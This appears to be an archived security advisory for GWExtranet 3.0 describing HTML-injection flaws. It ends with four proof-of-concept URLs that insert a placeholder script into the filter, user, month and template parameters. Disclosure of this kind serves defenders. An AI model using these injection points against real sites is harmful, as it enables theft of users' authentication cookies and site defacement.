12 lines
No EOL
888 B
Text
Executable file
12 lines
No EOL
888 B
Text
Executable file
source: http://www.securityfocus.com/bid/26582/info
|
|
|
|
GWExtranet is prone to multiple HTML-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input data before using it in dynamically generated content.
|
|
|
|
Attacker-supplied HTML and script code could execute in the context of the affected website, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.
|
|
|
|
GWExtranet 3.0 is affected by these issues; other versions may also be vulnerable.
|
|
|
|
http://www.example.com/GWExtranet/scp.dll/frmonth?filter=<EvilScript>
|
|
http://www.example.com/GWExtranet/scp.dll/frmonth?user=<EvilScript>
|
|
http://www.example.com/GWExtranet/scp.dll/frmonth?month=<EvilScript>
|
|
http://www.example.com/GWExtranet/scp.dll?user=USERID&template=<EvilScript> |